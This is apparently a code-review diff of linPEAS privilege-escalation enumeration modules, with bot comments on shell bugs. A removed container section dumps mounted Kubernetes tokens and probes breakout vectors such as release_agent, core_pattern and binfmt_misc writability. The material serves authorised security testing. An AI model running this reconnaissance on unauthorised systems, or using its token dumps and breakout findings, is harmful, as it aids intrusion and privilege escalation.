"s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
warn_exec lsb_release -a 2>/dev/null
if [ "$MACPEAS" ]; then
warn_exec system_profiler SPSoftwareDataType
fi
echo ""
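Review bot: the chain of twenty separate `sed -${E} "s,$kernelDCW_...,${SED_RED_YELLOW},"` processes on the `cat /proc/version` line has a silent failure mode: if any `$kernelDCW_*` or `$kernelB` variable is unset, that sed receives `s,,...,`, and a fresh sed process has no previous regular expression to fall back on, so it aborts with an error and the whole OS version line is swallowed. Collapse the chain into one `sed -${E} -e "s,...," -e "s,...,"` invocation and only append an `-e` expression for variables that are non-empty.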

@ -0,0 +1,36 @@
# Title: System Information - Sudo Version
# ID: SY_Sudo_version
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for sudo vulnerabilities and misconfigurations that could lead to privilege escalation:
# - Vulnerable sudo versions with known exploits
# - Common vulnerable versions and CVEs:
# * CVE-2021-3156 (Baron Samedit): Heap overflow in sudo
# * CVE-2021-23239: Potential privilege escalation
# * CVE-2021-23240: Potential privilege escalation
# * CVE-2021-23241: Potential privilege escalation
# - Exploitation methods:
# * Version exploits: Use known exploits for vulnerable sudo versions
# * Common targets: sudo < 1.9.5p2 (Baron Samedit)
# * Exploit techniques:
# - Heap overflow exploitation
# - Race conditions
# - Memory corruption
# - Command injection
# License: GNU GPL
# Version: 1.0
# Functions Used: echo_not_found, print_2title, print_info
# Global Variables: $sudovB
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Sudo version"
if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version"
sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
else echo_not_found "sudo"
fi
echo ""
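Review bot: `else echo_not_found "sudo"` puts the body on the `else` line, unlike every other module in this series; move it to its own indented line. The `sed -${E} "s,$sudovB,${SED_RED},"` also has the empty-variable hazard: if `$sudovB` is unset the expression becomes `s,,...,`, sed aborts with no previous regular expression, and the version line disappears instead of being printed unhighlighted; guard it with `[ "$sudovB" ]` or fall back to a plain `cat`.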

@ -0,0 +1,47 @@
# Title: System Information - USBCreator
# ID: SY_USBCreator
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for USBCreator vulnerabilities that could lead to privilege escalation:
# - Vulnerable policykit-desktop-privileges versions
# - Common vulnerable versions:
# * policykit-desktop-privileges < 0.21
# - Exploitation methods:
# * D-Bus command injection through USBCreator
# * Abuse of policykit privileges
# * Common attack vectors:
# - D-Bus method call injection
# - PolicyKit authentication bypass
# - Command execution through USB creation
# * Exploit techniques:
# - D-Bus method spoofing
# - PolicyKit privilege escalation
# - USB device creation abuse
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $DEBUG
# Initial Functions:
# Generated Global Variables: $pc_version, $pc_length, $pc_major, $pc_minor
# Fat linpeas: 0
# Small linpeas: 0
if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
print_2title "USBCreator"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.html"
pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
if [ -z "$pc_version" ]; then
pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
fi
if [ -n "$pc_version" ]; then
pc_length=${#pc_version}
pc_major=$(echo "$pc_version" | cut -d. -f1)
pc_minor=$(echo "$pc_version" | cut -d. -f2)
if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then
echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
fi
fi
fi
echo ""
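Review bot: both `grep -oP` calls need a grep built with PCRE support; on a BusyBox/Alpine host `grep -P` fails, `pc_version` stays empty and the check silently reports nothing even when the package is vulnerable. Both patterns are expressible as EREs, so `grep -oE` is the safer choice. The version test also hard-codes the `0.NN` shape: `[ "$pc_length" -eq 4 ]` skips versions such as `0.9` or `0.20.1`, so compare `$pc_major`/`$pc_minor` directly and drop the length test. Finally the trailing `echo ""` sits outside the `if`, so a blank line is printed even when the USBCreator block did not run.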

@ -0,0 +1,42 @@
# Title: System Information - Path
# ID: SY_Path
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for PATH environment misconfigurations that could lead to privilege escalation:
# - Writable directories in PATH
# - Current directory (.) in PATH
# - Common vulnerable scenarios:
# * Writable system directories in PATH
# * Current directory in PATH
# * Relative paths in PATH
# - Exploitation methods:
# * PATH hijacking: Place malicious executables in writable PATH directories
# * Common attack vectors:
# - Replace common binaries (ls, cat, etc.)
# - Create malicious executables with common names
# - Abuse sudo PATH inheritance
# * Exploit techniques:
# - Binary replacement
# - Symbolic link attacks
# - PATH manipulation
# - Sudo PATH abuse
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $DEBUG, $IAMROOT, $OLDPATH, $PATH, $Wfolders
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "PATH"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses"
if ! [ "$IAMROOT" ]; then
echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
fi
if [ "$DEBUG" ]; then
echo "New path exported: $PATH"
fi
echo ""
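Review bot: when `$IAMROOT` is set the module prints the `PATH` title and link and then nothing, because the `echo "$OLDPATH"` is skipped; either print the path unhighlighted for root or skip the whole section. The highlighting expression `s,$Wfolders|\./|\.:|:\.,...,g` also misbehaves if `$Wfolders` is empty: the alternation then starts with an empty branch, which GNU sed treats as matching the empty string, so with the `g` flag colour codes are inserted between the characters of the path. Guard on `[ "$Wfolders" ]` or build the pattern only from the non-empty parts. The `2>/dev/null` on `echo "$OLDPATH"` has no effect and can go.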

@ -0,0 +1,39 @@
# Title: System Information - Date
# ID: SY_Date
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for system date and uptime information relevant to privilege escalation:
# - System uptime
# - Last boot time
# - System time
# - Common vulnerable scenarios:
# * Long uptime (unpatched systems)
# * Time-based vulnerabilities
# * Scheduled tasks timing
# * Cron job timing
# - Exploitation methods:
# * Timing attacks: Abuse time-based vulnerabilities
# * Common attack vectors:
# - Race conditions
# - Time-of-check to time-of-use (TOCTOU)
# - Scheduled task abuse
# - Cron job timing
# * Exploit techniques:
# - Race condition exploitation
# - TOCTOU attacks
# - Scheduled task manipulation
# - Cron job abuse
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, warn_exec
# Global Variables:
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
print_2title "Date & uptime"
warn_exec date 2>/dev/null
warn_exec uptime 2>/dev/null
echo ""
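Review bot: the Description header lists race conditions, TOCTOU and cron/scheduled task abuse, but the body only runs `date` and `uptime`; none of those scenarios is checked here, so the header should be trimmed to what the module actually prints (uptime as a hint for an unpatched host). Minor: `warn_exec date 2>/dev/null` redirects the stderr of `warn_exec` as a whole, so if warn_exec reports a missing binary on stderr that message is hidden too.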

@ -0,0 +1,40 @@
# Title: System Information - CPU info
# ID: SY_CPU_info
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for CPU information relevant to privilege escalation:
# - CPU architecture
# - CPU features
# - CPU vulnerabilities
# - Common vulnerable scenarios:
# * CPU-specific vulnerabilities (Spectre, Meltdown, etc.)
# * Missing CPU mitigations
# * Architecture-specific exploits
# * CPU feature abuse
# - Exploitation methods:
# * CPU-based attacks: Abuse CPU vulnerabilities
# * Common attack vectors:
# - Spectre/Meltdown exploitation
# - CPU feature abuse
# - Architecture-specific attacks
# - CPU timing attacks
# * Exploit techniques:
# - Side-channel attacks
# - CPU feature exploitation
# - Architecture-specific techniques
# - CPU timing exploitation
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, warn_exec
# Global Variables: $DEBUG, $EXTRA_CHECKS
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
print_2title "CPU info"
warn_exec lscpu 2>/dev/null
echo ""
fi
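Review bot: `lscpu` on recent util-linux prints `Vulnerability ...:` lines (Spectre, Meltdown and friends, read from `/sys/devices/system/cpu/vulnerabilities`), which is exactly what the header is about, yet the output is passed through unhighlighted; piping it through `sed "s,Vulnerable,${SED_RED}," | sed "s,Mitigation,${SED_GREEN},"` in the style of the other checks would make a missing mitigation stand out. Also, unlike the exploit-suggester modules this block is not guarded with `! [ "$MACPEAS" ]`, and there is no `lscpu` on macOS, so with `EXTRA_CHECKS` on macOS it only prints a not-found warning.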

@ -0,0 +1,41 @@
# Title: System Information - Mounts
# ID: SY_Mounts
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for mount point misconfigurations that could lead to privilege escalation:
# - Unmounted filesystems
# - Mount point permissions
# - Mount options
# - Common vulnerable scenarios:
# * Writable mount points
# * Insecure mount options
# * Unmounted sensitive filesystems
# * Shared mount points
# - Exploitation methods:
# * Mount point abuse: Exploit mount misconfigurations
# * Common attack vectors:
# - Mount point modification
# - Filesystem remounting
# - Mount option abuse
# - Shared mount exploitation
# * Exploit techniques:
# - Mount point manipulation
# - Filesystem remounting
# - Mount option exploitation
# - Shared mount abuse
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $DEBUG, $mountG, $mountpermsB, $mountpermsG, $notmounted, $Wfolders, $mounted
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
print_2title "Unmounted file-system?"
print_info "Check if you can mount umounted devices"
grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
echo ""
fi
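Review bot: `grep -v "^#" /etc/fstab | grep -Ev "\W+\#|^#"` filters `^#` twice, and the `\W+\#` branch drops every entry that carries a trailing comment after whitespace (e.g. `... 0 1 # root fs`), so such mount lines are never shown at all. Keep a single `grep -v "^[[:space:]]*#"` and strip trailing comments with `sed 's/[[:space:]]#.*$//'` instead. The `print_info` text has a typo ("umounted" for "unmounted"), and when the block runs only because `$DEBUG` is set on a host without `/etc/fstab`, nothing is printed under the title; an `echo_not_found "/etc/fstab"` branch would make that explicit.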

@ -0,0 +1,47 @@
# Title: System Information - Disks
# ID: SY_Disks
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for disk information and misconfigurations that could lead to privilege escalation:
# - Available disks
# - Disk permissions
# - SMB shares
# - Common vulnerable scenarios:
# * Writable disks
# * Insecure SMB shares
# * Exposed disk devices
# * Shared storage
# - Exploitation methods:
# * Disk access abuse: Exploit disk misconfigurations
# * Common attack vectors:
# - Disk device modification
# - SMB share abuse
# - Storage device access
# - Shared disk exploitation
# * Exploit techniques:
# - Disk device manipulation
# - SMB share exploitation
# - Storage device abuse
# - Shared disk access
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, warn_exec
# Global Variables: $DEBUG
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
if [ -d "/dev" ] || [ "$DEBUG" ] ; then
print_2title "Any sd*/disk* disk in /dev? (limit 20)"
ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
echo ""
fi
if [ "$(command -v smbutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
print_2title "Mounted SMB Shares"
warn_exec smbutil statshares -a
echo ""
fi
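Review bot: the `sed "s,crypt,${SED_RED},"` on the `/dev` listing is effectively dead code: `ls /dev` lists only the top-level directory and the preceding `grep -Ei "^sd|^disk"` keeps names beginning with sd/disk, whereas LUKS mappings in practice live under `/dev/mapper/` (typically as `*_crypt`) and never reach the sed. Either drop it or add a second listing of `/dev/mapper`. The `sd*/disk*` filter in the title also misses `nvme*`, `vd*` and `xvd*` devices common on modern and virtualised hosts; `grep -Ei "^(sd|disk|nvme|vd|xvd)"` would cover them.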

@ -0,0 +1,47 @@
# Title: System Information - Disks Extra
# ID: SY_Disks_extra
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for additional disk information and system resources relevant to privilege escalation:
# - Disk utilization
# - System resources
# - Storage statistics
# - Common vulnerable scenarios:
# * Low disk space (potential for race conditions)
# * Resource exhaustion
# * Storage device misconfigurations
# * System resource abuse
# - Exploitation methods:
# * Resource-based attacks: Abuse system resources
# * Common attack vectors:
# - Disk space exhaustion
# - Resource starvation
# - Storage device abuse
# - System resource manipulation
# * Exploit techniques:
# - Resource exhaustion
# - Storage device exploitation
# - System resource abuse
# - Resource-based attacks
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, warn_exec
# Global Variables: $DEBUG, $EXTRA_CHECKS
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if ([ "$(command -v diskutil 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
print_2title "Mounted disks information"
warn_exec diskutil list
echo ""
fi
if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
print_2title "System stats"
(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
warn_exec free 2>/dev/null
echo ""
fi
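Review bot: `echo_not_found "df and lsblk"` is called but `echo_not_found` is missing from the `Functions Used:` header (only `print_2title, warn_exec` are listed); if the builder relies on that list to pull helper functions into a build, this call can end up undefined. Also the first block's condition `([ diskutil ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]` means `$DEBUG` alone does not enable it, unlike every other `|| [ "$DEBUG" ]` guard in this series; confirm that is intended or move `$DEBUG` outside the parentheses.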

@ -1,418 +0,0 @@
###########################################
#---------) Container functions (---------#
###########################################
containerCheck() {
inContainer=""
containerType="$(echo_no)"
# Are we inside docker?
if [ -f "/.dockerenv" ] ||
grep "/docker/" /proc/1/cgroup -qa 2>/dev/null ||
grep -qai docker /proc/self/cgroup 2>/dev/null ||
[ "$(find / -maxdepth 3 -name '*dockerenv*' -exec ls -la {} \; 2>/dev/null)" ] ; then
inContainer="1"
containerType="docker\n"
fi
# Are we inside kubenetes?
if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
inContainer="1"
if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n"
else containerType="kubernetes\n"
fi
fi
# Inside concourse?
if grep "/concourse" /proc/1/mounts -qa 2>/dev/null; then
inContainer="1"
if [ "$containerType" ]; then
containerType="$containerType (concourse)\n"
fi
fi
# Are we inside LXC?
if env | grep "container=lxc" -qa 2>/dev/null ||
grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then
inContainer="1"
containerType="lxc\n"
fi
# Are we inside podman?
if env | grep -qa "container=podman" 2>/dev/null ||
grep -qa "container=podman" /proc/1/environ 2>/dev/null; then
inContainer="1"
containerType="podman\n"
fi
# Check for other container platforms that report themselves in PID 1 env
if [ -z "$inContainer" ]; then
if grep -a 'container=' /proc/1/environ 2>/dev/null; then
inContainer="1"
containerType="$(grep -a 'container=' /proc/1/environ | cut -d= -f2)\n"
fi
fi
}
inDockerGroup() {
DOCKER_GROUP="No"
if groups 2>/dev/null | grep -q '\bdocker\b'; then
DOCKER_GROUP="Yes"
fi
}
checkDockerRootless() {
DOCKER_ROOTLESS="No"
if docker info 2>/dev/null|grep -q rootless; then
DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)"
fi
}
enumerateDockerSockets() {
dockerVersion="$(echo_not_found)"
if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
SEARCHED_DOCKER_SOCKETS="1"
for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -o -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do
if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then
if echo "$int_sock" | grep -Eq "docker"; then
dock_sock="$int_sock"
echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g"
echo "Docker enummeration:"
docker_enumerated=""
if [ "$(command -v curl)" ]; then
sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)"
dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4)
echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi
fi
if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then
sockInfoResponse="$(docker info)"
dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4)
printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
fi
else
echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g"
fi
else
echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g"
fi
done
fi
}
checkDockerVersionExploits() {
if echo "$dockerVersion" | grep -iq "not found"; then
VULN_CVE_2019_13139="$(echo_not_found)"
VULN_CVE_2019_5736="$(echo_not_found)"
return
fi
VULN_CVE_2019_13139="$(echo_no)"
if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then
VULN_CVE_2019_13139="Yes"
fi
VULN_CVE_2019_5736="$(echo_no)"
if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then
VULN_CVE_2019_5736="Yes"
fi
}
checkContainerExploits() {
VULN_CVE_2019_5021="$(echo_no)"
if [ -f "/etc/alpine-release" ]; then
alpineVersion=$(cat /etc/alpine-release)
if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then
VULN_CVE_2019_5021="Yes"
fi
fi
}
checkCreateReleaseAgent(){
cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r subsys
do
if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then
release_agent_breakout2="Yes (unshare with $subsys)";
rm -rf /tmp/cgroup_3628d4
break
fi
done
}
checkProcSysBreakouts(){
dev_mounted="No"
if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then
dev_mounted="Yes";
fi
proc_mounted="No"
if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then
proc_mounted="Yes";
fi
run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null)
if ! [ "$run_unshare" = "Yes" ]; then
run_unshare="No"
fi
if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then
release_agent_breakout1="Yes"
else
release_agent_breakout1="No"
fi
release_agent_breakout2="No"
mkdir /tmp/cgroup_3628d4
mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null
if [ $? -eq 0 ]; then
release_agent_breakout2="Yes";
rm -rf /tmp/cgroup_3628d4
else
mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null
if [ $? -eq 0 ]; then
release_agent_breakout2="Yes";
rm -rf /tmp/cgroup_3628d4
else
checkCreateReleaseAgent
fi
fi
rm -rf /tmp/cgroup_3628d4 2>/dev/null
core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)"
modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)"
panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)"
panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)"
binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)"
proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)"
sysreq_trigger_dos="$( (echo -n '' > /proc/sysrq-trigger && echo Yes) 2>/dev/null || echo No)"
kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)" # Kernel Exploit Dev
kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev
mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
if [ "$(head -n 1 /tmp/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi
kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
kmem_writable="$( (echo -n '' > /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
mem_writable="$( (echo -n '' > /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)"
mountinfo_readable="$( (head -n 1 /proc/*/mountinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
uevent_helper_breakout="$( (echo -n '' > /sys/kernel/uevent_helper && echo Yes) 2>/dev/null || echo No)"
vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)"
security_writable="$( (echo -n '' > /sys/kernel/security/a && echo Yes) 2>/dev/null || echo No)"
efi_vars_writable="$( (echo -n '' > /sys/firmware/efi/vars && echo Yes) 2>/dev/null || echo No)"
efi_efivars_writable="$( (echo -n '' > /sys/firmware/efi/efivars && echo Yes) 2>/dev/null || echo No)"
}
##############################################
#---------------) Containers (---------------#
##############################################
containerCheck
print_2title "Container related tools present (if any):"
command -v docker
command -v lxc
command -v rkt
command -v kubectl
command -v podman
command -v runc
if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
print_2title "Am I Containered?"
execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
fi
print_2title "Container details"
print_list "Is this a container? ...........$NC $containerType"
print_list "Any running containers? ........ "$NC
# Get counts of running containers for each platform
dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l)
if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then
echo_no
else
containerCounts=""
if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi
if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi
if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi
if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi
echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED},"
# List any running containers
if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi
if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi
if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi
if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
fi
#If docker
if echo "$containerType" | grep -qi "docker"; then
print_2title "Docker Container details"
inDockerGroup
print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
enumerateDockerSockets
print_list "Docker version .................$NC$dockerVersion"
checkDockerVersionExploits
print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
if [ "$inContainer" ]; then
checkDockerRootless
print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
echo ""
fi
if df -h | grep docker; then
print_2title "Docker Overlays"
df -h | grep docker
fi
fi
#If token secrets mounted
if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
print_2title "Listing mounted tokens"
print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
ALREADY="IinItialVaaluE"
for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
ALREADY="$ALREADY|$TOKEN"
echo "Directory: $i"
echo "Namespace: $(cat $i)"
echo ""
echo $TOKEN
echo "================================================================================"
echo ""
fi
done
fi
if [ "$inContainer" ]; then
echo ""
print_2title "Container & breakout enumeration"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout"
print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')"
if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then
print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n"
fi
print_list "Seccomp enabled? ............... "$NC
([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
print_list "AppArmor profile? .............. "$NC
(cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
print_list "User proc namespace? ........... "$NC
if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
checkContainerExploits
print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_3title "Breakout via mounts"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
checkProcSysBreakouts
print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
